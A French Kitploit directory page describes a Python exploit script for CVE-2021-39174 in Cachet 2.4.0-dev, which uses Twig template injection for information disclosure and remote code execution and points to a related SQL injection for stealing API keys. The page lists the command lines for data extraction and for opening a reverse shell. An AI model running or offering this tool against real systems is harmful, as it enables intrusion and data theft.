Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cachet_2.4.0-dev — CVE-2021-39174 Cachet 2.4.0-dev | Kitploit
Outils/GitHubGitHub/hadrian3689/cachet_2.4.0-dev
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubhadrian3689/cachet_2.4.0-dev

cachet_2.4.0-dev

CVE-2021-39174 Cachet 2.4.0-dev

Voir le dépôt
il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-39174 Cachet 2.4.0-dev

Un script Python pour CVE-2021-39174 Cachet 2.4.0-dev – divulgation d'informations et RCE via injection de template côté serveur Twig. Pour la RCE, la clé API (API KEY) de l'utilisateur est nécessaire. Consultez le lien Leave Songs ci-dessous qui explique comment obtenir la clé API via une injection SQL CVE-2021-39165.

Pour commencer

Exécution du programme

  • Extraction de données
root@kitploit:~
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password
  • Reverse Shell
root@kitploit:~
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password -k API_KEY -lhost 127.0.0.1 -lport 1337

Aide

Pour afficher le menu d'aide :

root@kitploit:~
python3 cachet_2.4.0-dev.py -h

Remerciements

  • SonarSource
  • Leave Songs

Avertissement

Tout le code fourni dans ce dépôt est destiné à des fins éducatives et de recherche uniquement. Toute action et/ou activité liée au contenu de ce dépôt relève de votre seule responsabilité. L'utilisation abusive du code de ce dépôt peut entraîner des poursuites pénales à l'encontre des personnes concernées. L'auteur ne sera pas tenu responsable en cas de poursuites pénales intentées contre des personnes qui utiliseraient le code de ce dépôt de manière illégale.

Télécharger l’outil